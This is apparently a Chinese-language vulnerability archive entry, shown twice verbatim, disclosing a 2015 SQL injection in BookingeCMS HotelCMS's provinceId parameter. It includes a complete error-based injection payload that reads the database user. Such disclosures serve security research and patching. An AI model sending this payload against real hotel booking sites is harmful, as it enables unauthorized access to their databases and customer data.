VULHUB ™

### 0x01 漏洞简述 提交时间： 2015-09-04 13:33 公开时间： 2015-12-06 09:00 漏洞类型： SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=city.getCity 文件provinceId参数存在注入 ### 0x02 漏洞利用 测试Payload: （post提交） /?m=city.getCity ``` provinceId=1' AND (SELECT 7525 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IOvh'='IOvh&pageSize=0&json=true ```  ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2010-0137378

### 0x01 漏洞简述 提交时间： 2015-09-04 13:33 公开时间： 2015-12-06 09:00 漏洞类型： SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=city.getCity 文件provinceId参数存在注入 ### 0x02 漏洞利用 测试Payload: （post提交） /?m=city.getCity ``` provinceId=1' AND (SELECT 7525 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IOvh'='IOvh&pageSize=0&json=true ```  ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2010-0137378